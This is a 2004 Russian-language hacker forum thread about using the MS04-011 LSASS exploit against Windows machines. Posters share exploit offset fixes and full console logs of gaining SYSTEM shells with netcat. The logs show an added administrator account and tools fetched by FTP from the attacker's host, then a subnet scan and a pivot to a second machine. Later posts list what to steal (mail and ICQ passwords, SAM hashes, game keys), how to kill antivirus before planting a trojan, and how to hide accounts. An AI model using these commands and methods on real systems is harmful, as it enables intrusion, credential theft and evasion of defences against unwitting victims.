n00rg зачем тебе это надо если ты даже не знаешь что от этого можно получить...
забей на это и не пудри себе мозги
забей на это и не пудри себе мозги
11.05.2004 17:44:46
n00rg зачем тебе это надо если ты даже не знаешь что от этого можно получить...
забей на это и не пудри себе мозги |
|
|
|
11.05.2004 23:13:08
Проверил значит что и куда ?? Ну это ты своей бабушке заливай .. если тачки действительно, как ты говоришь дырявые, то нетстат обычно два три экрана прокатывает с открытыми портами , а уж проверить куда каждый ведёт - это ты гонишь ! Или ты вообще на дырявых тачках никогда не бывал или на всех трёх первым оказался ? (что действительно смешно) Да уж если чел дорос до того чтоб к тебе в систему забраться то наверно принял хоть какие-то меры (файреволл какой-нить) что б не влезли к нему а ты значит вот так запросто взял и ко всем троим зашёл ??? а они значит взяли и все трое тебя пустили ??? Не смеши народ Кулибин. Кстати мораль сей басни совсем другая - Если к вам пришли и нагло просят денег "на пиво" то посылайте их к "..злобному хацкеру .." который вчера двигал вашей мышкой а потом самоудалился с компьютера. Доказать что-то вот так запросто , на расстоянии может либо полный гений либо ... совсем наоборот. |
|||
|
|
12.05.2004 01:37:04
№10560203
------------ Сам-то читал что написал? Да и прочитай справку к netstat чтобы не маяться с кучей экранов P.S. И с чего ты взял, что я у них денег просил? Если предложили, не взял. P.S.S. А вот пивка действительно попил, по результатам этой истории. Догадайся с трех раз, за чей счет благодарность была |
|
|
|
12.05.2004 11:41:03
Soglasen s №10560203.. A spravo4ku po netstat ti sam po4itai... a pro ekrani №10560203 tebe skazal verno. No eto ne zna4it 4to u teby na ekrane 3 dos-okoska budet []. Mozet dogadaeshsy.... |
|||
|
|
12.05.2004 17:19:12
у меня XP Pro Rus + SP1 + BlastPatch и сплоит только досит. дело в том что в lsass.exe находится call esp а не jmp esp. поменял оффсет на 744fa92d (jmp esp в lsasrv.dll) и все заработало...
|
|
|
|
12.05.2004 17:51:14
подтверждаю [IMG]
|
|
|
|
13.05.2004 00:20:58
2all:
Когда входишь в шелл, то на атакуемой машине создаётся процесс NTVDM с привелегией SYSTEM. Этот процесс берёт ~40% ресурсов процессора. Из-за этого комп начинает тормозить, что выдаёт атаку. Кроме того процесс остаётся и после выхода из шелла. Можно ли изменить приоритет этого процесса, находясь в шелле и убить его при выходе, чтоб замести следы? |
|
|
|
13.05.2004 00:38:33
Охота на кидисов. Специально для №10560203 и mitnick
-------- У всех остальных участников форума прошу прощения за столь длинное описание банальных операций, которые вы проделывали не один раз -------- Поскольку оригинальных логов я и не думал сохранять на память, ситуацию смоделировал на виртуальной машине с учетом оставшихся данных от сниффера. 192.168.0.1 реальная машина подключенная к интернету 192.168.0.40 W2K server на виртуалке - это "приманка" 192.168.0.20 W2k машина "злодея" реальный Ip был 212.44.***.*** ------------------- /* Зафиксировано подключение к компьютеру */ lsass.exe:256 TCP 192.168.0.40:1000 192.168.0.20:1100 ESTABLISHED */ /* Посмотрим стандартные порты злодея */ C:\WINNT\system32>sl -bpvz 192.168.0.20 Scanning 1 IP... ------------------------------------------------------------ ------------------- 192.168.0.20 Responds with ICMP unreachable: Yes TCP ports: 135 139 445 UDP ports: 137 138 445 500 ------------------------------------------------------------ ------------------- /* Сегодня везет */ C:\WINNT\system32>ping 192.168.0.20 Обмен пакетами с 192.168.0.20 по 32 байт: Ответ от 192.168.0.20: число байт=32 время<10мс TTL=128 Ответ от 192.168.0.20: число байт=32 время<10мс TTL=128 Ответ от 192.168.0.20: число байт=32 время<10мс TTL=128 Ответ от 192.168.0.20: число байт=32 время<10мс TTL=128 Статистика Ping для 192.168.0.20: Пакетов: послано = 4, получено = 4, потеряно = 0 (0% потерь), Приблизительное время передачи и приема: наименьшее = 0мс, наибольшее = 0мс, среднее = 0мс /* Пробуем еща раз сканировать порты, результат тот-же */ /* Нас никто не блокирует, защиты от атак скорее всего нет */ /* или отключена */ /* Применим против злодея его-же орудие "труда" */ C:\Temp>ms04011lsass.exe 0 192.168.0.20 666 shellcode size 404 C:\WINNT\system32>nc -nvv 192.168.0.20 666 (UNKNOWN) [192.168.0.20] 666 (?) open Microsoft Windows 2000 [Версия 5.00.2195] (С) Корпорация Майкрософт, 1985-2000. C:\WINNT\system32> /* Очень хорошо. Посмотрим на его систему повнимательней */ C:\WINNT\system32>net SHARE net SHARE Общее имя Ресурс &nb sp; &nb sp; Заметки ------------------------------------------------------------ ------------------- IPC$ &n bsp; &n bsp; &n bsp; &n bsp; Удаленный IPC ADMIN$ C:\WINNT&nbs p; &nbs p; &nbs p; Удаленный Admin C$ &nbs p; C:\ & nbsp; & nbsp; Стандартный общий ресурс Команда выполнена успешно. /* Хотя зачем мне это?, по привычке наверно */ C:\WINNT\system32>net START net START Запущены следующие службы Windows 2000: cron DHCP-клиент DNS-клиент Plug and Play Агент политики IPSEC Диспетчер логических дисков Диспетчер подключений удаленного доступа Диспетчер учетных записей безопасности Журнал событий Защищенное хранилище Инструментарий управления Windows Клиент отслеживания изменившихся связей Обозреватель компьютеров Рабочая станция Расширения драйвера оснастки управления Windows Сервер Сетевой вход в систему Сетевые подключения Система событий COM+ Служба времени Windows Служба поддержки TCP/IP NetBIOS Служба удаленного управления реестром Съемные ЗУ Телефония Уведомление о системных событиях Удаленный вызов процедур (RPC) Команда выполнена успешно. /* Чисто, вот только нафиг ему cron? */ C:\WINNT\system32>cd c:\ C:\>findstr /s "*" cron.tab Program Files\cron\cron.tab:#*/15 8-16 * * 1-5 checkmail.exe ^C C:\>type c:\"Program Files"\cron\cron.tab #CRONTAB FILE # Classic crontab format: # Minutes Hours Days Months WeekDays Command #*/15 8-16 * * 1-5 checkmail.exe C:\>cd C:\WINNT\system32\ /* Чисто */ C:\WINNT\system32> C:\WINNT\system32>net user temp 666 /ADD net user temp 666 /ADD Пароль не отвечает требованиям политики. Проверьте минимальную длину пароля, его сложность, отличие от ранее использованных паролей. Для вызова дополнительной справки наберите NET HELPMSG 2245. /* Вот блин юзверь */ C:\WINNT\system32>net user temp 666asd!@# /ADD net user temp 666asd!@# /ADD Команда выполнена успешно. C:\WINNT\system32>net localgroup Администраторы temp /ADD net localgroup Администраторы temp /ADD Команда выполнена успешно. C:\Temp>psinfo -hsd \\192.168.0.20 -u temp -p 666asd!@# System information for \\192.168.0.20: Uptime:   ;   ; Error reading uptime Kernel version: &nbs p; Microsoft Windows 2000, Uniprocessor Free Product type: & nbsp; Professional Product version: &nbs p; 5.0 Service pack: & nbsp; 4 Kernel build number: 2195 Registered organization: b Registered owner: a Install date: & nbsp; 27.03.2004, 20:14:39 Activation status: Not applicable IE version: &nbs p; 5.0100 System root: & nbsp; C:\WINNT Processors: & nbsp; 1 Processor speed: 1.1 GHz Processor type: & nbsp; Intel Pentium III Physical memory:   ; 32 MB Video driver: OS Hot Fix Installed KB823182 27.03.2004 KB823559 27.03.2004 KB823980 27.03.2004 KB824146 27.03.2004 KB825119 27.03.2004 KB826232 27.03.2004 KB828028 27.03.2004 KB828035 27.03.2004 KB828749 27.03.2004 Q147222 27.03.2004 /* Ух-ты */ C:\Temp>pslist -t \\192.168.0.20 -u temp -p 666asd!@# Process information for 192.168.0.20: Name &n bsp; &n bsp; Pid Pri Thd Hnd VM & nbsp; WS Priv Idle &n bsp; &n bsp; &n bsp; 0 0 1   ; 0 0&nb sp; 16 & nbsp; 0 System 8   ; 8 31 189 1672   ; 76 24 smss &n bsp; &n bsp; 14 0 11 6 33 & nbsp;5256 72 & nbsp; 1072 csrss & nbsp; & nbsp; 160 13 11 240 18164 868& nbsp; 1348 winlogon &nbs p; &nbs p; 180 13 15 394 37104 1376 5776 services &nbs p; 208 & nbsp; 9 33 471 34392 1528 2668 cron &n bsp; 44 0 8 4 49& nbsp; 15628 140  ; 912 outpost   ; 512 8 9 181 64624 5392 5680 Spidernt &nbs p; 636 8 6 4 8 21256 2056 &n bsp; 864 regsvc 520 &nb sp; 8 5 163 26840 1832 1392 svchost   ; 536 8 9 231 21372 1568 1276 svchost   ; 588 8 26 444 39696 1132 3668 winmgmt   ; 640 8 4 113 21224 284& nbsp; 904 lsass & nbsp; & nbsp;220 9 17 381 32064 2084 3044 cmd &nb sp; &nb sp; 84 8 1   ; 33 8788   ;1020 292 explorer &nbs p; &nbs p; 828 8 10 275 36604 2756 3324 IEXPLORE &nbs p; &nbs p; 432 8 5 131 32792 5164 1292 cmd &nb sp; &nb sp; 460 8 1 22 &n bsp; 11348 52 & nbsp; 280 nc &nbs p; &nbs p; &nbs p; 244 8 1   ; 26 15584 &nbs p;260 380 internat &nbs p; &nbs p; 732 8 1 3 0 15236 980&nb sp; 324 /* Похоже до меня тут никто не был */ C:\WINNT\system32>netstat -np tcp netstat -np tcp Активные подключения Имя Локальный адрес Внешний адрес & nbsp;Состояние TCP 192.168.0.20:445   ; 192.168.0.20:1189 ESTABLISHED * TCP 192.168.0.20:666   ; 192.168.0.1:3601 & nbsp; ESTABLISHED * TCP 192.168.0.20:1110 &nbs p; 192.168.0.40:1000   ; ESTABLISHED TCP 192.168.0.20:1172 &nbs p; 192.168.0.40:445 TIME_WAIT TCP 192.168.0.20:1173 &nbs p; 192.168.0.20:445 TIME_WAIT TCP 192.168.0.20:1179 &nbs p; 192.168.0.20:445 TIME_WAIT TCP 192.168.0.20:1183 &nbs p; 192.168.0.20:445 TIME_WAIT TCP 192.168.0.20:1187 &nbs p; 192.168.0.20:445 TIME_WAIT TCP 192.168.0.20:1189 &nbs p; 192.168.0.20:445 ESTABLISHED /* И машинкой управляет тот кто за ней сидит, только два удаленных содинения */ /* одно от меня, другое ко мне */ /* И не говорите мне, что это вирь. Он не делает команд а-ля cd c:\ dir c:\ */ /* и прочих, присущих любознательным оп******м */ C:\WINNT\system32>net user temp /del net user temp /del Команда выполнена успешно. ------------------------------- Ну вот пожалуй примерно так и было. Насчет outpost и Spidernt это не прикол, они действительно присутствовали. Просто антивирь вовремя необновлялся, а outpost был отключен, чтобы не мешал эксплоиту и созданию нулевого сеанса. Ситуация АБСОЛЮТНО стандартная. Более-менее грамотный пользователь, знает что такое файрвол и антивирус, систему обновляет. Но только делает это как-то ...., ну в общем как всегда. А вот любознательность его подвела, а может жадность или еще что. И насчет совета №10560203 гнать всех приходящих с претензией куда подальше. Не советую. Дороже выйдет. Особенно когда на руках у пришедшего логи снифа, файрвола, ИДСки и все это подперто логами провайдера, а вы занимались взломом без прикрытия (как оно и бывает в большинстве случаев). Да согласен, это чистая подстава (трудно попасть на защищенную машину, если только вас туда специально не завели) но подобное (в смысле подставы) было в прошлом году в Европе, когда взламывали конторские машины, а потом стригли с клерков по 20-30 евро за молчание. А теперь представьте российский сценарий (этакий хакертрон) 1. Создаем реальную контору, с реальным счетом, деньгами на нем и удаленным доступом к нему по сети. 2. Вывешиваем заведомо дырявый комп в сеть (установив разумеется системы слежения и перехвата) 3. В папочку с броским названием Bank кидаем банковские выписки (причем реальные) ну и как бы случайно логин с паролем. 4. Ждем любителя халявы (тут придется поработать, что-бы вовремя знающих и умеющих отключать). 5. Посещаем "больного" с юристом, с кучей логов и группой поддержки. Ну а дальше в лучших российских традициях получаем с него гонорар или привлекаем к отработке. Б-РРР, что-то самому мрачновато стало. |
|
|
|
13.05.2004 02:37:57
грамотно всё обосновал
ананимусы даж притихли. |
|
|
|
13.05.2004 05:49:14
culibin
За что хакира взломал, а? Я тебя спрашиваю, за чтооо??? Ты, наверное, не понял - это он всех ХаК4Ть должен, а не ты его. Ахахаха ::)))) Вот взломал беднягу, и терь в тюрьму попадешь - логи компрметации то сам выложил, а остальные какие-нить логи на машину тебе докидают вместе с вирями и прочими уликами. Так что готовь бочку пива, если проблем не хочется - мы уже идем )) |
|
|
|
13.05.2004 10:16:13
--> culibin
ladno veru... teoritti4eski....no na praktike kogda usera dobavlyesh a potom probuesh konnect delat' to on tebe neprili4nie slova vidaet: Access is denied. nuzno 4tobi onmashinu rebootnul. A tak neploxo... |
|
|
|
13.05.2004 10:18:23
a xakera pravda zalko
|
|
|
|
13.05.2004 12:19:51
mitnick написал - "..ladno veru..." А я вот ни фига не верю что ты попал запросто на три тачки которые сломали твою подставу. При том что это не просто ламерьё которое знает только "Аny key" а юзеры которых ты поймал на их же собственные грабли - бред. Приводить в ответ многостраничную распечатку "netstat" с дырявой тачки я постесняюсь (уж прости - флеймом не занимаюсь) но вот фрагмент из лога "...а outpost был отключен, чтобы не мешал эксплоиту и созданию нулевого сеанса..." А это нафига ? Без отключения ну ни как не мог ? Явная подстава - не появится ли завтра такой-же лог с твоими похождениями на взломанную машину. А если чисто теоретически ( вот так бы сразу и говорил - ЧИСТО ТЕОРЕТИЧЕСКИ а то вводишь публику в заблуждение ) то всё просто! Кулибин. Примерно как у Жиглова - "Вор должен сидеть в тюрьме!" ...(даже если он и не вор). А ты не пробовал в трамвае подложить кому-нибудь кошелёк а потом громко ( на три страницы кричать - "Я поймал вора". Или вот полицейский приём во время обыска подсунуть наркотик а потом его найти в присутсвии понятых. Что касается логов то вот такие логи ни коим образом доказательством ни в суде ни где ещё не будут - поскольку это просто незаконно - ответный взлом на взлом системы. Доказательстовом могут служить логи прова и анализ содержимого винчестера но только ПОСЛЕ ЗАКОННОГО ИЗЬЯТИЯ. А вот так на расстоянии до изьятия диска - это бред ! И повторю ещё раз: всегда существует вариант что взлом произведён пусть с даже с Вашей машины но НЕ ВАМИ . Да любой порядочный червь открывает кучу портов на пораженной машине - можем ли мы эмулировать таким образом открытые червём порты и соединения - без проблемм ( средненький программер напишет софтину ). После этого провайдер зафиксировавший десяток другой соединений с Вашего IP будет сомневаться Who is who? где гарантия что это ваша деятельноcть ? Если к Вам пришли предъявив "корочки" с вполне конкретной целью (забрать комп на экспертизу) - то да, это серьёзно (хоть и не всё ещё потеряно), а если пришёл небритый субьект в помятом пальто с просьбой одолжить на стакан "Клинского" или хотя б "Фанты" то следует подробно рассказать что комп глючит в последнее время , мигает на правый глаз , мышка воще блин бегает как ненормальная и обязательно упомянуть про "..злобного хацкера..". |
|||
|
|
13.05.2004 16:47:23
№10560203
|
|||
|
|
13.05.2004 16:52:27
№10560203
|
|||
|
|
14.05.2004 19:06:44
-----------------------
----------------------- 221.158.*.1 - my comp comp_1 - 220.112.*.2 (192.168.0.55) в подсети : comp_2 - 192.168.0.131 ----------------------- ----------------------- CONSOLE 1 ----------------------- ----------------------- <<-- АТАКУЕМ IP 220.112.*.2 -->> D:\WINDOWS>expl.exe 0 220.112.*.2 4789 221.158.*.1 expl.exe 0 220.112.*.2 4789 221.158.*.1 MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1 --- Coded by .::[ houseofdabus ]::. --- [*] Target: IP: 220.112.*.2: OS: WinXP Professional [universal] lsass.exe [*] Connecting to 220.112.*.2:445 ... OK [*] Attacking ... OK <<-- ПЕРЕХОД НА ВТОРУЮ КОНСОЛЬ -->> ----------------------- ----------------------- CONSOLE 2 ----------------------- ----------------------- D:\WINDOWS>nc.exe -l -n -vv -p 4789 listening on [any] 4789 ... connect to [221.158.*.1] from (UNKNOWN) [220.112.*.2] Microsoft Windows XP [Версия 5.1.2600] © Корпорация Майкрософт, 1985-2001. C:\WINDOWS\system32> <<--ВСЁ "O`KEY" ГРУЗИМ РАБОЧИЙ СОФТ -->> C:\WINDOWS\system32>ftp ftp open 221.158.*.1 Пользователь (221.158.*.1:(none)): asdf get nc.exe get sl.exe get expl.exe get sbaanetapi.dll quit C:\WINDOWS\system32> C:\WINDOWS\system32>ipconfig ipconfig Настройка протокола IP для Windows Подключение по локальной сети 3 - Ethernet адаптер: DNS-суффикс этого подключени. . . : IP-адрес . . . . . . . . . . . . : 220.112.*.2 Маска подсети . . . . . . . . . . : 255.255.255.0 Основной шлюз . . . . . . . . . . : 220.112.*.126 Подключение по локальной сети 2 - Ethernet адаптер: DNS-суффикс этого подключени. . . : IP-адрес . . . . . . . . . . . . : 192.168.0.55 Маска подсети . . . . . . . . . . : 255.255.255.0 Основной шлюз . . . . . . . . . . : C:\WINDOWS\system32> <<-- ПОИСК ПОТЕНЦИАЛЬНО УЯЗВИМЫХ МАШИН В ПОДСЕТИ -->> C:\WINDOWS\system32>sl.exe -hpt 445 192.168.0.1-254 sl.exe -hpt 445 192.168.0.1-254 Scan of 254 IPs started at Fri May 14 10:50:49 2004 --------------------------------------------------- 192.168.0.55 Responds with ICMP unreachable: No TCP ports: 445 --------------------------------------------------- 192.168.0.131 Responds with ICMP unreachable: No TCP ports: 445 --------------------------------------------------- 192.168.0.212 Responds with ICMP unreachable: No TCP ports: 445 --------------------------------------------------- 192.168.0.236 Responds with ICMP unreachable: No TCP ports: 445 --------------------------------------------------- Scan finished at Fri May 14 10:51:06 2004 ScanLine 1.01 Copyright © Foundstone, Inc. 2002 254 IPs and 254 ports scanned in 0 hours 0 mins 16.95 secs <<-- НАЙДЕНО 4 МАШИНЫ С ОТКРЫТЫМ 445 ПОРТОМ -->> <<-- ГОТОВИМ ВТОРУЮ КОМАНДНУЮ СТРОКУ НА 1-АТАКОВАННОЙ МАШИНЕ -->> C:\WINDOWS\system32>copy nc.exe nc2.exe copy nc.exe nc2.exe Скопировано файлов: 1. C:\WINDOWS\system32>echo start /b nc.exe -l -n -vv -p 2458 -e cmd.exe>q.bat echo start /b nc.exe -l -n -vv -p 2458 -e cmd.exe>q.bat C:\WINDOWS\system32>start q.bat start q.bat <<-- ОТКРЫТ ЕЩЁ ОДИН ПОРТ С УПРАВЛЕНИЕМ КОМ.ИНТ-ОМ НА ПОРТУ 2458 -->> C:\WINDOWS\system32> <<-- АТАКУЕМ С ЭТОЙ МАШИНЫ СЛЕДУЮЩУЮ ЦЕЛЬ - IP 192.168.0.131 -->> C:\WINDOWS\system32>expl.exe 0 192.168.0.131 8080 expl.exe 0 192.168.0.131 8080 MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1 --- Coded by .::[ houseofdabus ]::. --- [*] Target: IP: 192.168.0.131: OS: WinXP Professional [universal] lsass.exe [*] Connecting to 192.168.0.131:445 ... OK [*] Attacking ... OK <<-- ЦЕЛЬ УСПЕШНО ПРОЭКСПЛОАТИРОВАНА -->> ----------------------- ----------------------- CONSOLE 1 ----------------------- ----------------------- <<-- ПОДСОЕДИНЯЕМСЯ КО ВТОРОМУ ИНТЕРПРЕТАТОРУ КОМ.СТРОКИ НА 1-ОЙ МАШИНЕ-->> D:\WINDOWS>nc.exe -n -vv 220.112.*.2 2458 nc.exe -n -vv 220.112.*.2 2458 (UNKNOWN) [220.112.*.2] 2458 (?) open Microsoft Windows XP [Версия 5.1.2600] © Корпорация Майкрософт, 1985-2001. <<-- С 1-ОЙ МАШИНЫ ПОДСОЕДИНЯЕМСЯ КО 2-ОЙ МАШИНЕ IP 192.168.0.131 -->> C:\WINDOWS\system32>nc2.exe -n -vv 192.168.0.131 8080 nc2.exe -n -vv 192.168.0.131 8080 (UNKNOWN) [192.168.0.131] 8080 (?) open Microsoft Windows XP [Версия 5.1.2600] © Корпорация Майкрософт, 1985-2001. C:\WINDOWS\system32> <<-- КОМАНДНАЯ СТРОКА НА 2-ОЙ МАШИНЕ ПОЛУЧЕНА ТОЛЬКО ДЛЯ ВЫПОЛНЕНИЯ КОМАНД В НЕЙ "ENTER" НАДО НАЖИМАТЬ ДВА РАЗА ПОДРЯД -->> |
|
|
|
15.05.2004 01:37:51
to №10560203
это всё хорошо,но был бы хороший облом если у того чела стоял касперский или что то вроде него... при попытке закачки тебя сразу же бы посекли. Вопрос остаётся отрытым не работающая команда tasklist и соответсвенно taskkill. тот кто спрашивал насчёт того что мона стянуть на компе жертвы: 1. Я бы стянул пасы к мылам закачав следующую прогу: The Bat! Password Viewer 1.0.2 и Outlook Password Viewer 1.0 не палятся антивиром как писалось выше вопрос о tasklist всё равно остайтся открытым. 2. стянул бы dat аски с последущим извлечением паролей к юинам и имением праймаков в случае если они были вбиты в бат или аутпук 3. можно забрать sam и посидеть за прогой SAMInside 2.1 стопроцетного шанса взлома не даю но шанс есть. 4. потом если хотим посадить трой идём в програм файлс и смотрим на наличие всяких там вебов, касперских, симантеков и тд. и тп. если есть то наверняка он запущен. Создаём например quit.bat и убиваем из процеса ехе антивира. 5. если на компе 2 операционки обычно так часто бывает например ХР и МЕ или ХР и 98SE то тащим system.ini>>>pwl вариант edialer а тоже возможен сделать эт проще через любой новый трой отключив сначала антивир. 6. Поклонникам игры в беттлнет посвящается ... мона стянуть ключи к всяким там варикам или диабло если они имеются на компе у жертвы, использовать можно как вёюер ключей закачав его или трой. 7. Всякие извращения по удалению или впариванию виров типа CIH и команды Format считаю ботством. 8. не забудьте удалить всё то что закачивали. Все действия по конекту к жертве и закачке на её комп приведены выше и расмотрению уже который раз бесмыслены. Кстати а кто то занет как можно создать build-in-account через командную строку. Он ведь не появляется при перезагрузке винды разве что его можно попалить из AT ... акк можно назвать схоже с MS хелповсвим аком, неопытный юзер думаю этого не заметит. |
|
|
|
16.05.2004 14:29:44
Народ, слушайте вопрос:
Залил я прогу, пишу start troy.exe Получаю: Отказано в доступе. Это что значит и как обойти возможно? |
|
|
|
16.05.2004 15:53:37
Посмотри через net start что там работает и через net stop попробуй остановить антивири и другие хитрые проги.Может поможет. |
||||
|
|
|||